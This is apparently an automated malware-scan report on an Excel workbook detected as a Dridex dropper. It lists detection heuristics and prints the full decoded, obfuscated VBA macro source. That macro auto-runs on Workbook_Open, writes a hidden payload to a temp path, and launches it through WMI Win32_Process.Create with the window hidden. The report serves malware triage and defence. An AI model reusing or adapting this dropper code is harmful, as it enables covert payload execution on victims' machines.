MALICIOUS
Risk Score: 240

Heuristics: 8

- ClamAV: Doc.Dropper.Dridex-9845759-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Dridex-9845759-0
- VBA project inside OOXML (medium, OOXML_VBA, 4 related findings): Document contains a VBA project — VBA macros present
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: With GetObject(x9MsV_bcy)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Workbook_Open macro (low, OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script: Private Sub Workbook_Open()
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access). Matched line in script: JSfpVbRb = Environ(r3uKVTv)
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15567 bytes |

SHA-256: 72ba5b06420ccc93acbe906a13ca1f0c724395d4ab3dcbb8ad51f1f7a3848dc9

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 268 of 476 identifiers look randomly generated (e.g. 'xlCylinderBarStacked100') — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
BoZ6zR75e = Array("WIsME_8jcx_fl5_G88y VcJuM580M" & CZ37Xrjr & "Ltzp_CqmY_4MNb_Snd J880p31Lc7p9YK ItI0ZiEYGX6jIU", "Kzm8E_u8Bc_P3C JYVW_U0j_K3R5" & O0IwXxvg & "Dia4e52kj3Z")
Mq0F_JHDF_hiM = mg1J_jnM_iBy.m7xMf_t2SK
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "mg1J_jnM_iBy"
Function tCK5H5tWcvNL(UyT9q_lXVO_Cse_PgVe)
tCK5H5tWcvNL = Chr(CLng((124 And xlDialogWorkspace))) _
AOKtb_wR7_jzA_5Fo = Len(Join(Array("LiOx8H7VVaBTWVYmG c2CoXYEBbE xwxs_iH7_BFbU", TOCK_9kW_vZwU & etYt_Zo8 - XOrcul1AD, "kAme_ZtBU XlhxPob GrlOi_e181_CfOI_lVQ" & Ozb9lrqflC0SG)))
End Function
Function m7xMf_t2SK()
Dim oJhjIuOQn5 As String
oJhjIuOQn5 = HfpN_m0wz_0ige.IV8f2aVwqgP6lFv.Text
IP8CW_qYA_fSi = wBhq3_Rz1q_FOBu & AU7NOMHxz5JKOP.JSfpVbRb(PkOyH_sI0.rVe7r680zJ(QMk0nFvvsSXU7XGBm)) & I7lMpwy0bBCW0D & mg1J_jnM_iBy.tCK5H5tWcvNL(T1xCv5hyBfg9) & I0D89n2jiX0A & OhWVuZJpI6 & EQpDl_gBwx_t53t_e5sb & AUxbB_N5Q_pY6_Rj1 & mg1J_jnM_iBy.YBBDe_a1c_3Zi_0LE(lV0vS_AnD) & IjPN_vFdh & E0iM_xiQS_V8Q_tdM & AU7NOMHxz5JKOP.hJhxtYDMkvRA
Open IP8CW_qYA_fSi For Binary As #CLng((xlAbsolute And xlRangeAutoFormatClassic1))
QtcXI9ks = Len(Join(Array("Tijow7YWJh0z0QzET" + "gIfgL_men_Yuy" & vZLHNHkyS7tEzaJ, Vs6bWhgEyb - SrZ38yL, "I4KpV_aKU7_YCZ_VMn GV5DC_Fjh_3fz", "FkzMGoPQdl6ir KcoGK_gcF vtU0_tYkf_Ryk_L4qq" + "GWbdmYykEOcLU", YpD04_O8v_upf, GVcx99aO2C * KvnmcgQgDoE4vO40)))
Put #CLng((xlAtTop Or xlFormatFromLeftOrAbove)), , oJhjIuOQn5
Close #CLng((xlOn And xlSortValues))
Eheb_JYu_0kQ = FTi4M_5WSF_4gK(EXvahxH84.O11iJl64M, rxGv_fL7.N23H_7APd_BHrb & IP8CW_qYA_fSi & Chr(34), HfpN_m0wz_0ige.OFBu5xPuvuvBzE8u(IbaXch8GV.U99fkYpCd9C))
vrLz5_Lht = Replace(V9RxZCFwRArbEai, M7DB4_9W4, Cpe0HNNs42)
End Function
Function FTi4M_5WSF_4gK(x9MsV_bcy, iCH0ihMFOn4OU, lWYsMR2glX)
Debug.Print HsX7v_x98_dYq9_nje
ANUI_30Cc = Len(Join(Array(PIAjLbhT3ixm, "XNOt_0u6K_XPk6 KZz9_P4j_azUO_xaRM OVDrMhJ0R9RQRTZf" + "cnpLZ_Csv_Qu1o WhhfqLW2WXCrj0V" & "DXtBiCO EfAHOBFG2sjk6oA", xiG60PEJ & uJyQ_0AYf_WqhN_klb, "G67v_lSa_G0h_gcL P5whPEOc fg8x_ezUU_Biu_M7e", "b3P7o_XqM_vdcf_NCwj" + "JBuG8_ZEWt_ZbXY_T3ie VdjYU_a2e Riqz_Ruf", E2KE9139 & "qEajYjJvT0Z5 Sa8zu_MZV_Y1A1_glrU SRmFwSlWLwvQ0NL")))
mUPrujqD2 = Abs(CLng((-1279 + (xlDialogWorkbookUnhide + (1.43969849246231 * -398)))))
O0demCh28nJa0 = Abs(CLng((367 Xor (777 + (642 - 742#)))))
UdOv_ZN7 = InStr(JS3am_6GI, AO5DCrkgz3eq5, X9Sk4_wxX_tnJ)
BVZJb3jFo = Year(ZA9g_3X5)
With GetObject(x9MsV_bcy)
RzosRcBNpCFTSjgj5 = Join(Array("AIEBI_hwN_PQtu tj48_azH_RlL TPUeW_Fsda", "JdWy_9hg_gWd_Hojp", ef7wqXqVJlb & PJNUgvgxioP & NWYE4xNK6g))
.Create iCH0ihMFOn4OU, Null, lWYsMR2glX
End With
'MJ7xKSPT0 PAlfYPrYTB7Q dSi1qODq Yvsrc1LCYHGzq1dFo Cs8nkmMm PAw1_x4qi haF3YCEBt
BetqZQE4 = Array(DIO2NqygxBvMSjf, Agpw_a7lK_Dvh_Vc9p)
F0cLY_n2i_55BZ_Udy = Year(TP0ywi6O4s7)
LZoQF4w0 = Weekday(DeyLzQTmmkTIpFav)
End Function
Function YBBDe_a1c_3Zi_0LE(eA1sbT7AGsX)
TTOtBqGRL2v = Len(Join(Array("VId1mkaW7assozYj xXCsayQGPyAYg8vS MIK8D_wEk_sQG_WAL" + "B90jWSZxFTnjV0u1" & "Xaxg4_MVv_tfB_KyK", BzlXCCe0u + zXjo0_6GEa_MGCi * Zh2s_kcdk_0gjr, "VuUY_vpy_Cdtq_0Tme sm4bEJFrabB MrRzHgQFn9rKdah", LJXLcp1Y603i1 & "IxH0A_0Th xk103nKl phOQA_pNP_7Cpe_Yt0P", AC69n_eTTJ_HQC7_XztQ & "yDybaZDfxJS")))
XwIS_tc3_VHo = Replace(sYJ1c_7fT_txLF, RumN9XZP9cyj, IFSoJZ61aHlKu)
dKax_VPF_PIF = Join(Array(gayV_A3p_ieA_zLFr))
Debug.Print X2xQ_VH85
'gLHGgboAy qgTs_J3Ng Z7JbrZMJXNO631 BsFyw_oAK0_cKj RsUh_2pf_ovE KMwswBd7xg5u3mR TpLMNs85b Oi9C_Pj8 BoMW_6TpE
YBBDe_a1c_3Zi_0LE = Hex(CLng((CLng((1.23822605965463 * 2548)) - CLng(((xlStockOHLC - 68#) Or xlCSVMSDOS)) + CLng(((4.70016207455429E-02 * 617) And (xlDialogWebOptionsFiles + -653#)))) * Rnd + CLng((4.20289855072464E-02 * 690))))
YjUEUuc = InStr(ScaZ_d30_0JY_OmZ, fwzRCm2, R7gPYyfB8)
mxJfb_jFEA = Replace(AJryrMjOuClBCcEe, XmcS9zpr, PD7DmllQoRIA)
FXfbWW5bpICZ = Array("ph1r2bU8iwdB4bC r0lSL0Qbd ZXiztTE" + "ylb2_Md2w_SYl_GdvQ ShTnE0FA6fEiICA" + "PC0lPlM SYlrBMdpWt7M75r", cDrC_jrLX - Kbb1x_7S3, "rpMWfiyQ" & FMPYncyDkvoY1t)
wAt8xFwA = Array(J5xWLpa1wVjc)
J5cWC_SeS6_3x7_4v4 = InStr(FbWAas9kGoL, I0pNeritDWINueOD, XH04c_26G_LkM_oss)
For J57Sqs5 = 0 To CLng((1910 And 1327))
FPvv_Bzt0_04p = J57Sqs5
Next J57Sqs5
End Function
Function oFyMuLcKiU(MyeftrMu0KD)
oFyMuLcKiU = ChrW(CLng((Not (-50 + 15#)))) _
End Function
Attribute VB_Name = "PkOyH_sI0"
Attribute VB_Base = "0{7D17EB91-BCBF-4F05-8CDE-28E46EE34111}{90C6F69F-6E06-477E-A006-03052142457B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function rVe7r680zJ(jTcpUgtES)
rVe7r680zJ = Join(Array(ChrW(CLng((Asc("a")))) + Chr(CLng(((xlDialogScenarioCells + -305.235789473684) * (-485 - -10#)))) _
+ ChrW(CLng((48 Xor (979 + -915#)))) + ChrW(CLng((AscW("d")))) _
+ ChrW(CLng(((0.643649815043157 * (2545 - 923#)) + -947))) + Chr(CLng((AscW("t")))) + Chr(CLng((Not -98)))))
GfPmW_4wl_fQ95_G3E = InStr(sJ7eZN1svH8, FCLz04Yvfaf, SfBF_1EmK_ksSb)
'jbqmg6P3nERme8Y T8Z19I4Z8c f6GC0H5vZtR R7ozRiW5 Utp2lmwg Mbdi_xVB_bBx
End Function
Attribute VB_Name = "AU7NOMHxz5JKOP"
Attribute VB_Base = "0{072A719A-D3BB-4C7A-99F1-A9B43C9CFD62}{A61DD593-2875-4A33-8C46-8169FBF5F88D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function JSfpVbRb(r3uKVTv)
'e0xwgYs0F2Y hecoY1e43fxlz CIg2_tKt1_GkIa_Tk0 NrKH6_sXb KcdR_XBc_WO8u_OOE YNxyAhQgNVY0
NZrb09rjVcbv1C = Replace(Rrr1_f9KC_ygp, Tq4jq_53Ej_p1nK_iDB, XnwAF_SWc_OhAZ)
Bkhbl6zcYl = Weekday(EcIk_p6Kt_T22_QH5P)
HGAr_pcO_9hH = Len(Join(Array(OamqD_Lkkd_DS0_dm8, h1frS5N7Q0x * JSU0Vb1rH + M90fQy5U, Bl4xS_oFF ^ GPCe_OuwT, "G73s_DUu FmFJYKODewt SVAX3qqFd9Lj4TS", zgey0kCFhi7K)))
Olz4S_bRU_kTbJ = Year(RdEEaOn0)
xZM46dYA = CLng((1946 And 3359)) > CLng((xlDialogWorkbookUnhide - xlDialogPhonetic))
JSfpVbRb = Environ(r3uKVTv)
kGnxH_Ne5h_m0CB_0oX = InStr(CeeI_pEP_oS2b, W3F03_mWL_qOQ_qmZZ, QhqAA_GvY)
RmJE_Nbzw_M3Uu = Replace(A373_wU1W, VkVjXfQZKDoQlBXe, S0ig_6h3_jpvQ)
'YdQTO_KeBi_2Qc P3ldQAS0dOv TR1y3TMfzE SFa0NyF1kTpC ck8D_83K_yHEH_sF9
OOef_s2wX_STlX_wio = Split(U4ADowL, ccNk43Et, fpx1u_S82_hiE)
ULEvJ37nJw4mhl0t = CLng(((610 + (310 - 532#)) Or 164)) < CLng((((xlDialogSubscribeTo - 217.303623490212) * 2401) Or 1849))
OdmK_5oUs_Ji03_kyv = Len(Join(Array(A3i3_kx4_nEam_bCYT * NLQF_Dxc_EDE & Qhwt_3y5_LhtV, XiChWXqvJkIU & "JeCqg63V3LMO7b EmQA_TetV_Orz_tYqZ vKKL_q6H" & JenjV7xFpNyYE7g, A8WqlMTr20JC & "JlpNE_c6F KreA15cJe6QpW" & dvBEKGvAhzAeDIr)))
PVkD_oJQ_TNi = Join(Array("VzT1_9vr_Hsh" & V1Ley2bme3n * SMwClGIqs9R, CecrRXSI - U5zi_p5yY_fMbe_0sG6, "NNWtX_DCP2_StKL QLxB_rbE JDkd1q5rEfOvQOP" + "ZoysL25yOlRC vWLN9AQ4fOFX0l"))
Id00e_hyv_GAY_J4s = Join(Array("I7Ey0_4v9_z0eK_JFL" & "MEWaIYVt8c26hQU wPFL_ro0Z" + "EsXoNGQZHw9216 HaZ2_HKxt_QoE_gBP", G50C_UCLF_TDA & "H4Macc7ZIk7r MXIQYUqaplwVm" & OUM3_7I9_HH8Q, "XAkOwZGmy56Q" & Vyt0j3KIAdvF9, "XihV4iRPpRdO UkoSK4fkQMh58N3 Mh1fm_W2l8" & VMH1_y60x_lfA, JaCVtmcC0yUaWG7, "O4Y34_DGN_DrnQ puU2_QLuW_fKd sVQvZM4y", Ux3d2_VA4 & "Qnik_4w8I Ipc0V9m" & "D004ynYq"))
JEku_YcYj_oOvi = CLng((444 Xor xlRangeAutoFormatClassicPivotTable)) > CLng((979 And 735))
H0hY_jA1p_5xWO_Q0D = Abs(CLng((-150 - -602)))
SToQN_Hko0_vO2r_APOy = Weekday(R4hfeQAkC7jmRT5)
wpq0I4JrRBy = Split(Vc1AWWGEjjvJM8, EGYdwtM, I92ujguhAZxc7)
i9rjz_ml8t = "441"
Idg54RaGnFM = Year(DOM93Zl5)
End Function
Function hJhxtYDMkvRA()
hJhxtYDMkvRA = Join(Array(Chr(CLng((xlXMLSpreadsheet And xlLineStacked))) + ChrW(CLng((AscW("x")))) _
+ Chr(CLng((672 - (2.85641025641026 * xlDialogGallery3dLine)))) + Chr(CLng(((-438 + 437.834862385321) * -654))) _
))
End Function
Attribute VB_Name = "rxGv_fL7"
Function N23H_7APd_BHrb()
N23H_7APd_BHrb = Join(Array(ChrW(CLng(((5.40241156388465E-04 * -312) * -706))) & ChrW(CLng((503 + -394))) & ChrW(CLng((-0.433884297520661 * -242))) _
& Chr(CLng((xlCylinderBarStacked100 Or xlDialogGalleryArea))) _
& ChrW(CLng((((-536 + 536.080160320641) * 499) And xlDialogInsert))) _
& Chr(CLng((AscW("o")))) & Chr(CLng(((-133 + 352#) + (-1014 + 910#)))) _
& ChrW(CLng((633 - ((-427 - -620#) - -408#)))) _
& Chr(CLng((AscW("g")))) & ChrW(CLng(((0.174329501915709 * 522) Xor xl3DBarStacked100))) _
& ChrW(CLng(((-334 - 516#) + (0.786004882017901 * 1229)))) & Chr(CLng((-796 - (-9.74117647058823 * (1024 + -939#))))) _
& Chr(CLng((-2.35 * (865 - 885#)))) _
& Chr(CLng((Asc("f")))) & Chr(CLng(((0.259953161592506 * (xlDialogEditSeries - -199#)) And xlDialogDeleteFormat))) _
& Chr(CLng((118 And 123))) & Chr(CLng((-446 + (242 - -313#)))) & ChrW(CLng((Not (24.5 * (1.34228187919463E-02 * -298))))) & ChrW(CLng((AscW("t")))) & ChrW(CLng((0.117647058823529 * xlDialogCustomViews))) & Chr(CLng((-768 - (-672 + (-475 - -345#)))))))
For ss103HBBw = 0 To CLng(((1356 - 844#) Or 648))
Oi0MP_k1R5 = ss103HBBw
Next ss103HBBw
JlLYzZK7 = Array(ELLo7ZOCBte3EGGz & "FlAewLE FoeU9_X7H_QaGG_5jdY jRw2_z8B" & BexEjS1THw, "nO6h5ZVlgc4sFz9" & JMvWWT1lWTfYE, "mY3c_9CP vJ6NLFeX9 oCstN_Dc8_QBY_LIAC", "ms5wk8sTU nx2VDyKR0B1w", "Vmc6ld2V BElbbVhnfFU8F4eK")
End Function
Attribute VB_Name = "EXvahxH84"
Attribute VB_Base = "0{5DFC5BE4-662A-408B-BCB4-58EF6B3C1E8E}{3556C9EF-D9DE-49F8-9630-48706A110839}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function O11iJl64M()
O11iJl64M = Join(Array(Chr(CLng((-0.266219239373602 * -447))) & ChrW(CLng((Asc("i")))) & ChrW(CLng(((0.173972602739726 * 730) And (371 + -261#)))) _
& ChrW(CLng((Asc("m")))) _
& Chr(CLng(((785 + 289#) - 971))) & ChrW(CLng(((xlDialogChartTrend - (-108 + 457.75)) * xlDialogLabelProperties))) _
& Chr(CLng((118 And (471 + -355#)))) _
& ChrW(CLng((AscW("s")))) & ChrW(CLng((Not (0.178787878787879 * -330)))) & ChrW(CLng((551 + -437))) & Chr(CLng((((-1849 + 559#) - -442#) - -959))) & Chr(CLng((xlCurrencyLeadingZeros Or xlDialogDeleteFormat))) & Chr(CLng((Asc("t")))) & Chr(CLng((9.03732809430255E-02 * 1018))) & Chr(CLng((Asc("c")))) & Chr(CLng(((-177 + 741#) + -459))) & ChrW(CLng(((-87 - -876#) + -680))) & ChrW(CLng((-31 + 149))) & ChrW(CLng((-0.122549019607843 * -408))) & ChrW(CLng((AscW(":")))) _
& Chr(CLng(((1533 - 679#) + (-12 - 755#)))) & Chr(CLng(((1.33755274261603 * xlDialogProperties) + -529))) & Chr(CLng((xlDialogDeleteName Or xlFormatFromLeftOrAbove))) & Chr(CLng((-795 - ((-709 - 521#) + 384#)))) & Chr(CLng((0.12853470437018 * 389))) _
& ChrW(CLng((Not (0.09375 * (-1429 - -405#))))) _
& ChrW(CLng((-564 + 644))) _
& Chr(CLng((xlAlternateArraySeparator Or xlCylinderCol))) _
& Chr(CLng((xlPieOfPie Xor (-6.92431561996779E-02 * (-244 - 377#))))) & ChrW(CLng(((-0.208421052631579 * -475) And xlDialogNew))) & ChrW(CLng(((316 - 633#) + 418))) & ChrW(CLng(((0.170876671619614 * 673) And (0.197115384615385 * 624)))) & ChrW(CLng(((-53 + 84#) - (9.10075839653304E-02 * -923))))))
End Function
Attribute VB_Name = "IbaXch8GV"
Attribute VB_Base = "0{811010D0-5DD9-48FE-8AF9-4DFBA053D7B3}{87AD64A7-5E3A-42A8-9813-728FB186389E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function U99fkYpCd9C()
U99fkYpCd9C = Join(Array(Chr(CLng((xlXYScatterLinesNoMarkers Xor xl3DBarClustered))) + Chr(CLng((((xlDialogGallery3dLine - 195.000345144961) * 820) * -371))) _
+ Chr(CLng((Not ((-290 - -504#) - 325#)))) + ChrW(CLng((xlTotalsCalculationMax Xor (0.545918367346939 * xlDialogGallery3dPie)))) _
+ Chr(CLng((Not (3.85185185185185 * (-224 - -197#))))) _
+ ChrW(CLng((xlRangeAutoFormatTable9 Or (-0.221978021978022 * -455)))) + Chr(CLng((-546 - (-1128 + (331 - -135#))))) + Chr(CLng((0.107778819119025 * 1067))) + Chr(CLng((Asc(":")))) + Chr(CLng(((-610 - -260#) + 442))) _
+ Chr(CLng((Asc("r")))) _
+ Chr(CLng((0.103159851301115 * 1076))) + Chr(CLng((xlDialogVbaProcedureDefinition - (-708 + 927#)))) + ChrW(CLng((Not -117))) + Chr(CLng(((10.5 * xlSendPublisher) Xor xlXYScatterSmoothNoMarkers))) + Chr(CLng((Not -100))) + Chr(CLng(((990 + -938#) Xor xlCylinderColStacked))) + ChrW(CLng((Asc("m")))) + Chr(CLng(((0.975265017667845 * 1132) - 986))) + ChrW(CLng(((-936 - -991#) Xor xlUnderlineStyleDoubleAccounting))) + Chr(CLng((AscW(":")))) _
+ ChrW(CLng(((-4.83168316831683 * -101) - 401))) _
+ Chr(CLng((Not -106))) + ChrW(CLng((AscW("n")))) + ChrW(CLng((48 Or xlExcel4Workbook))) + Chr(CLng((Asc(xlClassic2)))) _
+ Chr(CLng((xlCylinderBarClustered And xlDialogWorkspace))) + ChrW(CLng((Asc("P")))) + ChrW(CLng((-286 + (918 - 518#)))) _
+ Chr(CLng((AscW("o")))) _
+ Chr(CLng(((6.99893955461294E-03 * (602 + -479#)) * 115))) + ChrW(CLng((1.24691358024691 * xlRadarMarkers))) + ChrW(CLng((xlUnderlineStyleDoubleAccounting Xor ((0.365972222222222 * -1440) + 645#)))) + ChrW(CLng((-383 - -498))) + Chr(CLng((xlStockVOHLC And xlDialogNew))) + ChrW(CLng((Asc("t")))) + ChrW(CLng((121 And xlConeColClustered))) + ChrW(CLng((xlPCX Xor 120))) + ChrW(CLng((xlAutomaticUpdate Xor xlPyramidCol))) + ChrW(CLng((Asc("u")))) _
+ ChrW(CLng((-622 + 734)))))
End Function
Attribute VB_Name = "HfpN_m0wz_0ige"
Attribute VB_Base = "0{3ABD3A2F-3DC4-454A-8A0A-33CB4F3DEED9}{784AFC99-FBF7-47EA-BA45-64CD2C0ABFB6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function OFBu5xPuvuvBzE8u(qizby_euH)
Set OFBu5xPuvuvBzE8u = GetObject(qizby_euH).SpawnInstance_
ZVWx_5uHt_Yxi = Len(Join(Array()))
kKAkxzGRon = Array("tkNL_7KGa" + "wYHOvO1R K1OqypoNkvS8 S3N1_D0Dm_hMQ" + "P7RlSPXVzCd", "Hddu71scSGYttpH")
IOzV9Bw202ACz8Y = Array(XBtIzDpNpfn - Fo0ck_VrJ_Tie, "NV0g8_BIWE_1P7")
Debug.Print NZAZS_OEz_q4hH_tcjN
RFHUkqY4gSl = Len(Join(Array("ISgobchGFFJf8UwD JSY3pd5VsPBIOGb tRDhW5A" & "KqAX5_iMTj_d7H P4UuDboT5QD ElzrHAakc0AD" & S96fvu9h, "TcD5_IXZ" + "Ntmo8ourYdNO9", "VtJS_OjsB" + "Xqayp_y53h LpYWAW0f" & EsAFO_Z08_WMG_9e5Y, "FUlwetbCAy4YlLNj BBQz_zgWp_0FVz_xrQ KDlnA_nyDz_cCQ_9om" + "pdulMzk")))
OFBu5xPuvuvBzE8u.ShowWindow = CLng((562 - (972 + (239 - 661#))))
HziJE_jAIQ = Replace(eDhU_nlK_byVO, ERrER1LxJaokRF, P0gOH_tnV_5tR)
WLb7I_1F0_kh4 = "960"
Debug.Print RnW8H_OF0U_Th3
OZYD_0MkW_cM4_23j = Abs(CLng(((0.508296943231441 * 1145) Or xlDialogChartWizard)))
EQYM_iyO = CLng((((-429 - -908#) - 976#) + -84)) > CLng((-735 - -108))
l68FpyUWIXEpZ8tf = Join(Array(gmsQ_NES_X6L_o1Z, QRGb4B9GWMRL87Do & "sc4sJqCMwzWK6E" & OU0p_Zpm, "Vp5C_krq_u6X_0sh q9g1FrpAf4RjVO UC3JH_A8G" & P3wpB_Rop_77F & "Gql6osO XAXuYF4TFa", "YkYyzCLfAk70Ws MM50DqIrhOGT8Ga KY4JcQi" & KxBf_w1m_RIN & "kuMwvVoOb i7ICF_N15b_vU2_ngW8"))
End Function

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 68608 bytes |

SHA-256: 8d204f25a2a84758189a354e9b9bd59a11516e95abfa8d342910a388720cbb6c

Detection
- ClamAV: Doc.Dropper.Dridex-9845759-0
- Obfuscation or payload: unlikely